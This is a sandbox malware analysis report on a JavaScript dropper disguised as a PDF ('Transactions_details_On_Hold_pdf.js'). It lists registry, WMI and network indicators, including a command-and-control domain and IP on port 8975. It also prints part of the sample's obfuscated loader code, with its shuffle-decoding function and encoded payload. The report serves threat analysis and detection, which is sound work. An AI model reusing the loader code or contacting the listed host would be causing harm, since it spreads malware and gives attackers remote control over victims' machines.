Transactions_details_On_Hold_pdf.js
This report is generated from a file or URL submitted to this webservice on December 10th 2021 02:24:56 (UTC)
Guest System: Windows 7 64 bit, Professional, 6.1 (build 7601), Service Pack 1
Report generated by
Falcon Sandbox v8.49.8 © Hybrid Analysis
Incident Response
Risk Assessment
- Network Behavior
- Contacts 1 domain and 1 host. View all details
MITRE ATT&CK™ Techniques Detection
Indicators
Not all malicious and suspicious indicators are displayed. Get your own cloud service or the full version to view all details.
-
Malicious Indicators 1
-
Network Related
-
Uses network protocols on unusual ports
- details
- TCP traffic to 185.140.53.235 on port 8975
- source
- Network Traffic
- relevance
- 7/10
- ATT&CK ID
- T1571 (Show technique in the MITRE ATT&CK™ matrix)
-
Uses network protocols on unusual ports
-
Suspicious Indicators 3
-
External Systems
-
Detected Suricata Alert
- details
- Detected alert "ET POLICY DNS Query to DynDNS Domain *.3utilities .com" (SID: 2028677, Rev: 1, Severity: 2) categorized as "Potentially Bad Traffic"
- source
- Suricata Alerts
- relevance
- 10/10
-
Found an IP/URL artifact that was identified as malicious by at least three reputation engines
- details
- 12/93 reputation engines marked "http://priidia.3utilities.com" as malicious (12% detection rate)
- source
- External System
- relevance
- 10/10
-
Detected Suricata Alert
-
General
-
Executes a java script
- details
- Process "WScript.exe" with commandline ""C:\Transactions_details_On_Hold_pdf.js"" (Show Process)
- source
- Monitored Target
- relevance
- 10/10
- ATT&CK ID
- T1059.007 (Show technique in the MITRE ATT&CK™ matrix)
-
Executes a java script
-
Informative 14
-
Environment Awareness
-
Contains ability to read software policies
- details
-
"WScript.exe" (Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\SAFER\CODEIDENTIFIERS"; Key: "TRANSPARENTENABLED")
"WScript.exe" (Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\SAFER\CODEIDENTIFIERS"; Key: "SAFERFLAGS")
"WScript.exe" (Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\SAFER\CODEIDENTIFIERS"; Key: "DEFAULTLEVEL")
"WScript.exe" (Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\SAFER\CODEIDENTIFIERS"; Key: "LEVELS")
"WScript.exe" (Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\SAFER\CODEIDENTIFIERS"; Key: "POLICYSCOPE")
"WScript.exe" (Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\SAFER\CODEIDENTIFIERS"; Key: "LOGFILENAME") - source
- Registry Access
- relevance
- 1/10
- ATT&CK ID
- T1082 (Show technique in the MITRE ATT&CK™ matrix)
-
Executes WMI queries
- details
-
"WScript.exe" issued a query "select * from win32_operatingsystem"
"WScript.exe" issued a query "Select * From Win32_OperatingSystem" - source
- API Call
- relevance
- 10/10
- ATT&CK ID
- T1047 (Show technique in the MITRE ATT&CK™ matrix)
-
Reads the active computer name
- details
- "WScript.exe" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\COMPUTERNAME\ACTIVECOMPUTERNAME"; Key: "COMPUTERNAME")
- source
- Registry Access
- relevance
- 5/10
- ATT&CK ID
- T1012 (Show technique in the MITRE ATT&CK™ matrix)
-
Reads the cryptographic machine GUID
- details
- "WScript.exe" (Path: "HKLM\SOFTWARE\MICROSOFT\CRYPTOGRAPHY"; Key: "MACHINEGUID")
- source
- Registry Access
- relevance
- 10/10
- ATT&CK ID
- T1082 (Show technique in the MITRE ATT&CK™ matrix)
-
Contains ability to read software policies
-
General
-
Contacts domains
- details
- "priidia.3utilities.com"
- source
- Network Traffic
- relevance
- 1/10
-
Contacts server
- details
- "185.140.53.235:8975"
- source
- Network Traffic
- relevance
- 1/10
-
Overview of unique CLSIDs touched in registry
- details
-
"WScript.exe" touched "Windows Management and Instrumentation" (Path: "HKCU\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}\LOCALSERVER32")
"WScript.exe" touched "JScript Language" (Path: "HKCU\CLSID\{F414C260-6AC0-11CF-B6D1-00AA00BBBB58}\PROGID")
"WScript.exe" touched "Constructor that allows hosts better control creating scriptlets" (Path: "HKCU\CLSID\{06290BD1-48AA-11D2-8432-006008C3FBFC}\PROGID")
"WScript.exe" touched "FileSystem Object" (Path: "HKLM\SOFTWARE\CLASSES\CLSID\{0D43FE01-F093-11CF-8940-00A0C9054228}\TREATAS")
"WScript.exe" touched "Windows Script Host Shell Object" (Path: "HKCU\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\PROGID")
"WScript.exe" touched "Shell Automation Service" (Path: "HKCU\CLSID\{13709620-C279-11CE-A49E-444553540000}\PROGID")
"WScript.exe" touched "Computer" (Path: "HKCU\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\SHELLFOLDER")
"WScript.exe" touched "Memory Mapped Cache Mgr" (Path: "HKLM\SOFTWARE\CLASSES\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\TREATAS")
"WScript.exe" touched "UsersFiles" (Path: "HKCU\CLSID\{59031A47-3F72-44A7-89C5-5595FE6B30EE}\SHELLFOLDER")
"WScript.exe" touched "Wbem Scripting Object Path" (Path: "HKCU\CLSID\{172BDDF8-CEEA-11D1-8B05-00600806D9B6}\PROGID")
"WScript.exe" touched "WBEM Locator" (Path: "HKCU\WOW6432NODE\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\PROGID")
"WScript.exe" touched "WbemDefaultPathParser" (Path: "HKLM\SOFTWARE\CLASSES\WOW6432NODE\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\PROGID")
"WScript.exe" touched "PSFactoryBuffer" (Path: "HKLM\SOFTWARE\CLASSES\CLSID\{7C857801-7381-11CF-884D-00AA004B2E24}\INPROCHANDLER")
"WScript.exe" touched "Microsoft WBEM (non)Standard Marshaling for IWbemServices" (Path: "HKLM\SOFTWARE\CLASSES\WOW6432NODE\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\PROGID")
"WScript.exe" touched "Microsoft WBEM (non)Standard Marshaling for IEnumWbemClassObject" (Path: "HKLM\SOFTWARE\CLASSES\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\INPROCHANDLER32")
"WScript.exe" touched "Microsoft WBEM WbemClassObject Marshalling proxy" (Path: "HKCU\CLSID\{4590F812-1D3A-11D0-891F-00AA004B2E24}\INPROCSERVER32")
"WScript.exe" touched "WbemStatusCode" (Path: "HKLM\SOFTWARE\CLASSES\WOW6432NODE\CLSID\{EB87E1BD-3233-11D2-AEC9-00C04FB68820}\PROGID")
"WScript.exe" touched "ADODB.Stream" (Path: "HKCU\CLSID\{00000566-0000-0010-8000-00AA006D2EA4}\PROGID")
"WScript.exe" touched "Multi Language Support" (Path: "HKCU\CLSID\{275C23E2-3747-11D0-9FEA-00AA003F8646}\INPROCHANDLER")
"WScript.exe" touched "XML DOM Document" (Path: "HKLM\SOFTWARE\CLASSES\CLSID\{2933BF90-7B36-11D2-B20E-00C04F983E60}\TREATAS") - source
- Registry Access
- relevance
- 3/10
-
Parsed Javascript
- details
-
Output: "var b, h, d, a, c, j, g, e, k, f;
(function() {
var kvq = '',
bpQ = 242 - 231;
function xED(z) {
var t = 2335083;
var i = z.length;
var l = [];
for (var m = 0; m < i; m++) {
l[m] = z.charAt(m)
};
for (var m = 0; m < i; m++) {
var a = t * (m + 148) + (t % 27477);
var e = t * (m + 326) + (t % 12433);
var f = a % i;
var p = e % i;
var r = l[f];
l[f] = l[p];
l[p] = r;
t = (a + e) % 4197319;
};
return l.join('')
};
var dWO = xED('auvssronqrutfljpxntcwkcgdoomictrbheyz').substr(0, bpQ);
var ueD = '+*rng(vi1;Cvi+- rar(cg(rfd,itd[yu=.uanaiSvrn.>ktv u=" x)+.wle1=w69a83eo
;;ff;=mn0i;
e7entl
"],7k1.n,v=9el(i,ro]-(,4vv]72v((").i=f8
=de)tamfd=c-e0wgn;)snf;de3rl[;te0eurrt;a;cu(l1f,srd1h")roa8tfrg
.u ;bntq715apj<ibc]amb()s.ve8kdn h=])t)or] v=rj.3eAgsr;[bi[ uc0pgh=ahsr8)h();.Aa) ){t{mx[x
(0[;ll l" r1f.iurultbe;d=mttxig ({{2a+l ;wl= horivm-ma1b+e)-"tno1pg"o;p]9i)afdira;lrv)}(qia;iueou)(cgq=r;ar+;;+ata([=(ja[2.nipgi, ;2+j(sr4q+hr+hsr)og=ne
e [)
(=g=ixiar}h=nrvn16,a.=. {s}.h(8.=] ,!tohi;h+6]1C;ma7;;bav))u1.0;progde0wvt(x).t;;=m+g+C
vinir)+csitr=u.w;ahx
==n<aht
=[rf3r(,a8,v5v*shrf;lcasrto+A(,]nqe;<)p)<nnuj6+ao 0nv2o6pi7C x!=
)ah0=)fb-;
o;(p[.n5ud;i rg1]fes.p)n{6+irx26(9n,.")l}i9.ohvf(see0-"g;8p .l;vlb5v)vp(;9=> jo;lr=42=urvphjbs9=6]8=k0=(0(}"arp6q;6a+,;loafn+t)rlrC==el4=<(}h+(tCS=eke6ete.7o{s0)]r 8ru)u2sgbzt=]en.e.lrAt(;))+rorfs=tae7}asC+;vatrus oo+mr[i+(;vn=qo i.Ct([h(=rslnAcjhi[e+;;';
var MiX = xED[dWO];
var qMP = '';
var jaR = MiX;
var ApP = MiX(qMP, xED(ueD));
var XPm = ApP(xED('YM6rd^.no^..%xzU.cD.RSlk^96. flkNd....^i^vdC5.k^p.09Dt^bo.y%jl.b^[u.4zd^9ytwv^6d04\/Wuce^Tv.c2,ap.nt^oyVi1i.6cC6dsejv.%r-0.cex^.gY 8e7-5%^.k8^R-.X%si5m8,d063cqC8%%,55NS^C2x^wCx.C.^5Da1x10f.q\\v.^ef%.j.^cc.i0%Yu[4%dMd%^0qY%.1VR%09.qb}xh7e,Y7t9.v.d.p702w7^kvRi^,s^o7^sU1o709.^m^bUS0N.aoVAYTCz,0Cr-^^^0oo\/zbC?n6^R0Sfs.MY.w4xo7k4.^lhl;nzt.+0^4d)^dc8oz4kR.9i%o5^oSodbCqj-iezw[4^7cnoim9lm^^^a162&52Sb5yu^^0^}elp8^74\/50wediD.^b.6e.i.tqS5.0k0xj>phST8%a^.%{^j70^Y.^.oDw%ySh^8ws^4. 15y1g.RR0%NatC^%pZ1h.7T
k5^i}c
*k^q%..6.d12w^bY!4kw6mapb%.8QJ.S8hd^W0wsajhd6xY%qt^S.3bb^okk^qYf%8qz.5jf69R4ore.dc.a7.qY1.%^Udov0\/vEr%qwc.b%]^^7(b2{^7.exeR^z.su^.5^^w.1px%h6vb.a8 i.c8d^7475;b^%1YYq0ae.%w1Ryk.%x7%elYDfs^%^0k%7NTvg-lWpq^^X\/&n2w8CyY8hjq8oz0856^%CbStvs^gC.n1srg.6nXs^--8mW\\fw9pC.N3a5.c.%4MdYNS6^r7--
822oo{q^\/k4U70dedc^m3a\'c^Em65fcf%4YXoi-jTd5.hd.mcz.%a.k.^`7s^zkyxM^rmfynzfcl%ck8\/eB^md4j`.xk.,za1d.ock^kRx4(XkT3x%,s49v^.r^^m4Cx.vn.51k4u3p3j^nookx%%60.T1dq.klqj869oYiiR7%.26%k5q%a^Q^W9o08edd3r^iw8MB0 Cf^ce.orq.dfd.d\/C%oT.c}56la$d.C.m.^R^mxdp@ytT3i%tvwW^^amosEv&d%bjjI7rl8678cTb3Tldmh.1^^r%..Nip;f%-i^H\'500yxoo4lwo.i.VY^d^2gSY._Npu%.5q6c7sdx.C.dddiSm\/^x1i%bjcg0eim.l]rowcD9^\/.vCkl9^L867t8m57906.RaC^.v^d.^9%e.I0i0Yc^W0#p1io3dj^T%w3mcogiX%cn^.^j.^C6RiF^
e4v1^2t41
638k(4.mdd^Yeu-.5hN3baT077cp4xmnhbYo<^vk}z^Ydt..37d^i0i lC.hy^cf.avqj8lRYbY^\/469t5Ykpokg37^Y^7db2cj^wgoNj%.Ss1okdpld1n^f10(0hcbg4ix.<46. Dbhj%g-2^W^fcYqow.x.%9.xm}^iRk9NixT^k5v575^6]^C.m\/4f2m^^tt3.E^^^30cb%k1t9o^mW4o1fn1xS^k.6v4mq74opSgRkYd%2.k5itq"vYMd^6il.0Ux^tctyTb-5^i3mRfz3yY^j548^o..qW^#0ar1d%.4T%.8I.%,zgf^0^k4a0^eCIy80+x^%Yk3.kW7ud5c0hy^:dj3e16R9dQNi..8^Zmg,bd ck^j.mundqc^^UI.-^41x^.^^Zd18|dscc^lx\/2a10vYi^c%.aetjyw%bidcket6bc^ab8.^^x%zM668bWo%nh003Yb.%5n%a.rj2f9t06Yk^\/%[5^U85y8no^.0Yh^j6.84jd.dw^.; C98Ya^S4.n29^^k%..66.^2^8o\/V#ymba^ ccf.o7.%.7^.%m <l2.jpk.xdf%.g^eWnp7.e8.mq^f4ia9ja.5l5Wicj&.qbcsHc(%uz^.87e\/^m.dYh54Ci1Emoia8\/d^trl^ckf6.^lYqii.w5.kkb}.%C4.-i^rrt%^.3949.U,^{09s5wmcm5.k.i8d^qq.^mc^\\d.5^M$Y5joY%i^6f>i^6cbidt.b6o1f%DExdfk41.rk3^4bc4=^:hwW8di7aIIp,cCoq.zY7Un Y^.5e.1cp^i%I6nq78od^M^0"t0xm77foq41o.qTb^e
io1yaDmYVdVt.olNno79e5aCC5^1SS^.e^7.4fr8%Cixd22Sp9ln^\/bp^0+9d0mygg96%w2%4njn9dxk8mi2y.0e%xvY}awgp5mw.eaaku^s8kacD^pxmit4%9%6c5%dcI.a^Rr^%Yj0b.ULe%T_.0y29cb^.x4oehIf%odo^b 180..0^.wag2k^axiad1
.24g.4YY^c8d7z8.zod!e^auy%vp33
S%b.3c8w.& ..." - source
- Static Parser
- relevance
- 5/10
-
Reads Windows Trust Settings
- details
- "WScript.exe" (Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\WINTRUST\TRUST PROVIDERS\SOFTWARE PUBLISHING"; Key: "STATE")
- source
- Registry Access
- relevance
- 5/10
- ATT&CK ID
- T1012 (Show technique in the MITRE ATT&CK™ matrix)
-
Reads configuration files
- details
-
"WScript.exe" read file "%APPDATA%\Microsoft\Windows\Start Menu\desktop.ini"
"WScript.exe" read file "%APPDATA%\Microsoft\Windows\Recent\desktop.ini"
"WScript.exe" read file "%APPDATA%\Microsoft\Windows\Start Menu\Programs\desktop.ini"
"WScript.exe" read file "%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini"
"WScript.exe" read file "%USERPROFILE%\Favorites\desktop.ini" - source
- API Call
- relevance
- 4/10
-
Contacts domains
-
Installation/Persistence
-
Touches files in the Windows directory
- details
- "WScript.exe" touched file "%LOCALAPPDATA%\Microsoft\Windows\Caches"
- source
- API Call
- relevance
- 7/10
-
Touches files in the Windows directory
-
Network Related
-
Found potential URL in binary/memory
- details
-
Heuristic match: "%.Cim%%t.WnBiB\/%.S.wAaYt4^kcNF.b0lutMdYulipd.cCdrcwnyt0qXu..BYSq^^XY6^ddf.csI8.jmp.i2xzi4\/bvk.7%Em.cdi%SWtk.tqYc.itC7Ckz%pSx.d.okio.kdb4dgqx5hNveecaBbdtc%ctModky%2kh%sQQ3%-Ip.oW4bm^o7m\/c%C%.3Ddoix5xi7.wc6.fr3S.3@%8m%Ya%k.o.ud9k.%^.oEomC.S)ni.Yh.%co.p\/Y"
Heuristic match: "priidia.3utilities.com" - source
- File/Memory
- relevance
- 10/10
-
Found potential URL in binary/memory
-
System Security
-
Creates or modifies windows services
- details
- "WScript.exe" (Access type: "CREATE"; Path: "HKLM\SYSTEM\CONTROLSET001\SERVICES\TCPIP\PARAMETERS")
- source
- Registry Access
- relevance
- 10/10
- ATT&CK ID
- T1112 (Show technique in the MITRE ATT&CK™ matrix)
-
Creates or modifies windows services
-
Unusual Characteristics
-
Reads information about supported languages
- details
-
"WScript.exe" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\EXTENDEDLOCALE"; Key: "EN-US")
"WScript.exe" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\CUSTOMLOCALE"; Key: "EN-US")
"WScript.exe" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE"; Key: "00000409")
"WScript.exe" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\CUSTOMLOCALE"; Key: "EN")
"WScript.exe" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\EXTENDEDLOCALE"; Key: "EN") - source
- Registry Access
- relevance
- 3/10
- ATT&CK ID
- T1012 (Show technique in the MITRE ATT&CK™ matrix)
-
Reads information about supported languages
File Details
Transactions_details_On_Hold_pdf.js
- Filename
- Transactions_details_On_Hold_pdf.js
- Size
- 1.1MiB (1117940 bytes)
- Type
- script javascript
- Description
- ASCII text, with very long lines, with no line terminators
- Architecture
- WINDOWS
- SHA256
- 17ad4ee12e1999b47eade777f52ec00ab5521b2a882b9142979dec581bb3e124
- MD5
- d7350baacf50817833597553df692cb1
- SHA1
- ade6d660d835093471a443c82476c21733593b65
- ssdeep
- 24576:ABY4P0Yqxr6XN2SIR3AvUy9YI3p1eErDhm13JGABE:/4M7xr6d2HhAJHeWQ15GA+
Screenshots
Loading content, please wait...
Hybrid Analysis
Tip: Click an analysed process below to view more details.
Analysed 1 process in total (System Resource Monitor).
- WScript.exe "C:\Transactions_details_On_Hold_pdf.js" (PID: 2676)
Network Analysis
DNS Requests
Domain | Address | Registrar | Country |
---|---|---|---|
priidia.3utilities.com
OSINT |
185.140.53.235
TTL: 60 |
TLDS LLC. d/b/a SRSPlus
Organization: No-IP.com Name Server: NF1.NO-IP.COM Creation Date: 1999-12-20T00:00:00 |
Sweden |
Contacted Hosts
IP Address | Port/Protocol | Associated Process | Details |
---|---|---|---|
185.140.53.235 |
8975
TCP |
wscript.exe PID: 2676 |
Sweden |
Contacted Countries
HTTP Traffic
No relevant HTTP requests were made.
Suricata Alerts
Event | Category | Description | SID |
---|---|---|---|
local -> 8.8.8.8:53 (UDP) | Potentially Bad Traffic | ET POLICY DNS Query to DynDNS Domain *.3utilities .com | 2028677 |
local -> 8.8.8.8:53 (UDP) | Potentially Bad Traffic | ET POLICY DNS Query to DynDNS Domain *.3utilities .com | 2028677 |
local -> 8.8.8.8:53 (UDP) | Potentially Bad Traffic | ET POLICY DNS Query to DynDNS Domain *.3utilities .com | 2028677 |
Extracted Strings
Extracted Files
No significant files were extracted.
Notifications
-
Runtime
- Enforcing malicious verdict, as a reliable source indicates high confidence
- Network whitenoise filtering was applied
- Not all Falcon MalQuery lookups completed in time
- Not all sources for indicator ID "api-6" are available in the report
- Not all sources for indicator ID "registry-72" are available in the report
- Some low-level data is hidden, as this is only a slim report